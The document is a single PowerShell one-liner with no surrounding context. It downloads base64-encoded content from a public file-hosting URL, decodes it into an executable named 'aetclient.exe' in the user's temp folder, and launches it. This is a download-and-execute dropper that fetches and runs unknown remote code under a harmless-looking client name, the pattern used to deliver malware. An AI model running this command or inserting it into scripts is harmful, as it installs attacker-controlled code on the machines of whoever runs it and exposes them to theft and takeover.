$b=irm https://files.catbox.moe/5z57x9.txt; $p=$env:temp+'\aetclient.exe'; [IO.File]::WriteAllBytes($p, [Convert]::FromBase64String($b)); start $p